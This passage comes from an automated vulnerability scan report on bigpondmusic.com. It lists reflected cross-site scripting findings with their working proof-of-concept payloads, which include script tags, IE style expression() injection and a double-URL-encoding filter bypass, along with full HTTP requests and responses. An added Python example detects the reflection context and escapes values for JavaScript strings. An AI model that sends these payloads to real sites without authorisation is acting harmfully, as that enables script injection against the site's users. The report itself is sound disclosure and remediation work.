X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88077


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album8a220"><script>alert(1)</script>30cfeaa9154/jebediah/lost-my-nerve" />
...[SNIP]...

2.70. http://bigpondmusic.com/album/jebediah/lost-my-nerve [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/jebediah/lost-my-nerve

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b225c'%3bbfd4f81406a was submitted in the REST URL parameter 1. This input was echoed as b225c';bfd4f81406a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. The response below shows the reflection point: the s.channel assignment in the inline analytics script, where the single quote and the semicolon both arrive unencoded, so the literal is closed early and whatever follows it is parsed as JavaScript. The 404 sitemap page still populates that block from the URL segments, so the reflection does not depend on a valid album route. The scanner could not turn this into a full proof-of-concept for injecting arbitrary JavaScript, which usually means a further character the payload needs is filtered or encoded; examine the application's behaviour manually to identify the input validation or other obstacle in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be escaped for a JavaScript string literal before it is written out (hex- or unicode-escape every character outside [A-Za-z0-9], so that quotes, backslashes, line terminators and the sequence </script> cannot appear in the emitted script). HTML entity encoding is the wrong tool here, since entities are not decoded inside a script block.

Request

GET /albumb225c'%3bbfd4f81406a/jebediah/lost-my-nerve HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87850


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumb225c';bfd4f81406a';
   s.prop4 = 'jebediah';
   s.prop5 = 'lost-my-nerve';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 +
...[SNIP]...

2.71. http://bigpondmusic.com/album/jebediah/lost-my-nerve [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/jebediah/lost-my-nerve

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c136"style%3d"x%3aexpression(alert(1))"9fa3aac2c39 was submitted in the h parameter. This input was echoed as 4c136"style="x:expression(alert(1))"9fa3aac2c39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer (and disabled in its later standards modes), so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that closes the value attribute of the parentUrl hidden input and lets the attacker supply further attributes, is browser-independent and is not limited to the style attribute.

Request

GET /album/jebediah/lost-my-nerve?h=7663953484c136"style%3d"x%3aexpression(alert(1))"9fa3aac2c39 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 97105


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Jebediah - Lost My Nerve - B
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/jebediah/lost-my-nerve?h=7663953484c136"style="x:expression(alert(1))"9fa3aac2c39" />
...[SNIP]...

2.72. http://bigpondmusic.com/album/jebediah/lost-my-nerve [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/jebediah/lost-my-nerve

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14bc1"style%3d"x%3aexpression(alert(1))"5bf96062524 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14bc1"style="x:expression(alert(1))"5bf96062524 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer (and disabled in its later standards modes), so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that closes the value attribute of the parentUrl hidden input and lets the attacker supply further attributes, is browser-independent and is not limited to the style attribute.

Request

GET /album/jebediah/lost-my-nerve?14bc1"style%3d"x%3aexpression(alert(1))"5bf96062524=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 96924


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Jebediah - Lost My Nerve - B
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/jebediah/lost-my-nerve?14bc1"style="x:expression(alert(1))"5bf96062524=1" />
...[SNIP]...

2.73. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/katy-perry/teenage-dream2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97338'%3ba8b005e798b was submitted in the REST URL parameter 1. This input was echoed as 97338';a8b005e798b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. The response below shows the reflection point: the s.channel assignment in the inline analytics script, where the single quote and the semicolon both arrive unencoded, so the literal is closed early and whatever follows it is parsed as JavaScript. The 404 sitemap page still populates that block from the URL segments, so the reflection does not depend on a valid album route. The scanner could not turn this into a full proof-of-concept for injecting arbitrary JavaScript, which usually means a further character the payload needs is filtered or encoded; examine the application's behaviour manually to identify the input validation or other obstacle in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be escaped for a JavaScript string literal before it is written out (hex- or unicode-escape every character outside [A-Za-z0-9], so that quotes, backslashes, line terminators and the sequence </script> cannot appear in the emitted script). HTML entity encoding is the wrong tool here, since entities are not decoded inside a script block.

Request

GET /album97338'%3ba8b005e798b/katy-perry/teenage-dream2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87906


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album97338';a8b005e798b';
   s.prop4 = 'katy-perry';
   s.prop5 = 'teenage-dream2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3
...[SNIP]...
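Findings 2.62, 2.67, 2.70 and 2.73 all reflect REST URL parameter 1 into the same place, the s.channel assignment of the inline analytics script, with the single quote and semicolon intact. The following is an added example, not code from this report or from bigpondmusic.com, that does the two things a tester and a developer each need here: classify where a probe landed by lexing the script text up to the marker, and apply JavaScript-string escaping so a reflected quote can no longer close the literal. The sample body is constructed from the 2.62 response snippet; the lexer tracks only string literals and backslash escapes (no comments, regex or template literals), which is an assumption that is sufficient for this page.

```python
"""Added example: locate and fix a reflection into a single-quoted JavaScript
string (findings 2.62, 2.67, 2.70, 2.73). Not code from the report or from
bigpondmusic.com; the sample body is constructed from the report's response
snippet and the lexer is a deliberately small model of JS syntax."""
import re

# Constructed from the 2.62 response: the analytics block that echoes URL segment 1.
ECHOED = "ba08d';1e196c98b41"
SAMPLE_BODY = f"""<html><head><title>Site Index - Sitemap</title>
<script type="text/javascript">
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album{ECHOED}';
   s.prop4 = 'guy-sebastian';
   s.prop5 = 'twenty-ten';
</script></head><body></body></html>"""

# Constructed: the same marker reflected into an HTML attribute instead.
ATTR_SAMPLE = f'<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album{ECHOED}/" />'


def js_lexer_state(script_text):
    """State of a minimal JS lexer at the end of script_text: 'code', "'" or '"'.
    Tracks string literals and backslash escapes only (assumption: no comments,
    regex or template literals in the script being examined)."""
    state = 'code'
    i = 0
    while i < len(script_text):
        ch = script_text[i]
        if state == 'code':
            if ch in '\'"':
                state = ch
        elif ch == '\\':
            i += 1                      # skip the escaped character
        elif ch == state:
            state = 'code'
        i += 1
    return state


def reflection_context(body, marker):
    """Where the first copy of marker landed: 'not reflected', 'html',
    'js-code', or "js-string:<quote>" when inside a quoted JS literal."""
    pos = body.find(marker)
    if pos < 0:
        return 'not reflected'
    opened = body.rfind('<script', 0, pos)
    closed = body.rfind('</script', 0, pos)
    if opened < 0 or closed > opened:
        return 'html'
    script_start = body.find('>', opened) + 1
    state = js_lexer_state(body[script_start:pos])
    return 'js-code' if state == 'code' else f'js-string:{state}'


def js_escape(value):
    """Escape for a JS string literal: every character outside [A-Za-z0-9]
    becomes \\xHH (or \\uHHHH above U+00FF), so quotes, backslashes, line
    terminators and '</script>' cannot appear in the emitted script."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append(f'\\x{cp:02x}')
        else:
            out.append(f'\\u{cp:04x}')
    return ''.join(out)


def js_unescape(value):
    """Inverse of js_escape, used to confirm the round trip is lossless."""
    return re.sub(r'\\x([0-9a-f]{2})|\\u([0-9a-f]{4})',
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), value)


def render_channel(value, escape=None):
    """The vulnerable assignment from the response; pass escape=js_escape for the fix."""
    return f"   s.channel = '{escape(value) if escape else value}';"


# Exactly one single-quoted literal followed by ';' and nothing else.
_INTACT = re.compile(r"^\s*s\.channel = '(?:[^'\\\n]|\\.)*';\s*$")


def literal_intact(line):
    """False when the reflected value closed the literal early (breakout)."""
    return _INTACT.match(line) is not None
```

reflection_context(SAMPLE_BODY, ECHOED) reports the marker inside a single-quoted JS string, which is the "Firm" finding above; render_channel('album' + ECHOED) fails literal_intact, while the same value passed through js_escape renders as a single closed literal and round-trips through js_unescape unchanged.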

2.74. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/katy-perry/teenage-dream2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91242%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88b03c31949 was submitted in the REST URL parameter 1. This input was echoed as 91242"><script>alert(1)</script>88b03c31949 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will already have carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Validation alone is not the fix, though: the response below shows the value written into the parentUrl hidden input with its double quote unencoded, so the value must be HTML-attribute-encoded at the point where it is emitted, regardless of what the filter accepts.

Request

GET /album91242%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88b03c31949/katy-perry/teenage-dream2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88218


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album91242"><script>alert(1)</script>88b03c31949/katy-perry/teenage-dream2" />
...[SNIP]...

2.75. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/katy-perry/teenage-dream2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d910c"style%3d"x%3aexpression(alert(1))"024dde3346f was submitted in the h parameter. This input was echoed as d910c"style="x:expression(alert(1))"024dde3346f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/katy-perry/teenage-dream2?h=721914442d910c"style%3d"x%3aexpression(alert(1))"024dde3346f HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 119924


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Katy Perry - Teenage Dream -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/katy-perry/teenage-dream2?h=721914442d910c"style="x:expression(alert(1))"024dde3346f" />
...[SNIP]...

2.76. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/katy-perry/teenage-dream2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c9b0"style%3d"x%3aexpression(alert(1))"852375c399a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c9b0"style="x:expression(alert(1))"852375c399a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/katy-perry/teenage-dream2?7c9b0"style%3d"x%3aexpression(alert(1))"852375c399a=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 119868


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Katy Perry - Teenage Dream -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/katy-perry/teenage-dream2?7c9b0"style="x:expression(alert(1))"852375c399a=1" />
...[SNIP]...

2.77. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/ke-ha/we-r-who-we-r

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1527c'%3b7ca3ed36b7c was submitted in the REST URL parameter 1. This input was echoed as 1527c';7ca3ed36b7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album1527c'%3b7ca3ed36b7c/ke-ha/we-r-who-we-r HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88208


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album1527c';7ca3ed36b7c';
   s.prop4 = 'ke-ha';
   s.prop5 = 'we-r-who-we-r';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|'
...[SNIP]...

2.78. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/ke-ha/we-r-who-we-r

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8492d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f6f8063291 was submitted in the REST URL parameter 1. This input was echoed as 8492d"><script>alert(1)</script>9f6f8063291 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album8492d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f6f8063291/ke-ha/we-r-who-we-r HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87992


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album8492d"><script>alert(1)</script>9f6f8063291/ke-ha/we-r-who-we-r" />
...[SNIP]...

2.79. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/ke-ha/we-r-who-we-r

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba52"style%3d"x%3aexpression(alert(1))"bbd03f69418 was submitted in the h parameter. This input was echoed as eba52"style="x:expression(alert(1))"bbd03f69418 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/ke-ha/we-r-who-we-r?h=761402717eba52"style%3d"x%3aexpression(alert(1))"bbd03f69418 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
